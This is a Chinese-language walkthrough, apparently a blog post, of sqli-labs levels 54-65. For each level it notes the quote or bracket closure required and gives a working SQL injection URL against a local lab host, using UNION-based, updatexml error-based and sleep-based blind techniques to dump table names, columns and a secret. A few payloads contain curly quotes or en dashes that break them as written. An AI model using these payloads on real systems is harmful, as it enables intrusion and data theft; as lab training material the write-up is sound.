Advanced Injections
最后一篇补上。
less-54
字符型注入,只不过这里只能限制十次查询,超过十次就会随机更换表名和字段名。也就是说我们要在10次内查询所有结果,这其实是够的。
http://127.0.0.1/sql-labs/less-54/index.php?id=-1' union select 1,version(),database()--+
http://127.0.0.1/sql-labs/less-54/index.php?id=-11' union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema='challenges'--+
http://127.0.0.1/sql-labs/less-54/index.php?id=-11' union select 1,group_concat(column_name) ,3 from information_schema.columns where table_name='f4kp5pe0zk'--+
http://127.0.0.1/sql-labs/less-54/index.php?id=-11' union select 1,2,group_concat(id,0x7e,sessid,0x7e,secret_CEKG,0x7e,tryy) from challenges.f4kp5pe0zk--+
输入对应的secret_CEKG,即可闯关成功
less-55
还是限制查询次数,一旦超过次数,还是会改表名和字段名
变成了限制14次,还有参数包裹变了下
http://127.0.0.1/sql-labs/less-55/?id=-1) union select 1,user(),version()--+
也就是说把闭合换下,还是能查数据的,只不过查询限制为14次。
less-56
还是一样闭合改下即可
http://127.0.0.1/sql-labs/less-56/?id=-1') union select 1,user(),version()--+
less-57
还是闭合问题…作者每一个闭合都独自做一道题:’,",’),")。
http://127.0.0.1/sql-labs/less-57/?id=-1" union select 1,user(),version()--+
less-58
没有打印数据库查询结果,这里联合查询是不能用的。
下面有打印出报错信息,可以尝试报错注入。
http://127.0.0.1/sql-labs/less-58/index.php?id=-1' and updatexml(1,concat(0x7e,(select database())),1)--+
只允许查询5次,5次后改名
less-59
还是一样,基于上题,改变闭合。
http://127.0.0.1/sql-labs/less-59/index.php?id=-1 and updatexml(1,concat(0x7e,(select database())),1)–+
less-60
("$id"),闭合即可,还是使用报错注入
http://127.0.0.1/sql-labs/less-60/index.php?id=-1") and updatexml(1,concat(0x7e,(select database())),1)--+
less-61
闭合:
http://127.0.0.1/sql-labs/less-61/index.php?id=-1')) and updatexml(1,concat(0x7e,(select database())),1)--+
less-62
错误回显都被注释了,可以进行盲注测试
http://127.0.0.1/sqli-labs/Less-62/?id=1') and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+
less-63
'闭合,盲注
http://127.0.0.1/sql-labs/Less-63/?id=1’and if(ascii(substr(database(),1,1))=99,sleep(5),1)–+
less-64
))闭合
http://127.0.0.1/sql-labs/Less-64/?id=1)) and if(ascii(substr(database(),1,1))=99,sleep(5),1)--+
less-65
")
http://127.0.0.1/sql-labs/Less-65/?id=1") and if(ascii(substr(database(),1,1))=99,sleep(5),1)--+